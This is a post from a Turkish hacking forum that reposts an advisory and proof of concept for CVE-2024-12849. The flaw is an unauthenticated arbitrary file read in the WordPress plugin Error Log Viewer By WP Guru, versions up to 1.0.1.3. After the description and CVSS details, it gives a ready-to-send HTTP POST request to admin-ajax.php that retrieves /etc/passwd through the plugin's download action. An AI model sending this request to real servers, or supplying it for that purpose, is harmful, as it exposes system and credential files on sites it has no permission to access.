Hoşgeldin Misafir

WordPress Error Log Viewer by WP Guru 1.0.1.3 Arbitrary File Read Vulnerability

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# CVE-2024-12849
Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Unauthenticated Arbitrary File Read
 
# Description
 
The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
 
## Details
 
- **Type**: plugin
- **Slug**: error-log-viewer-wp
- **Affected Version**: 1.0.1.3
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2024-12849
- **Status**: Active
 
POC
---
 
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
 
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd
```
 
#  turkhacks.com [2025-01-13]  #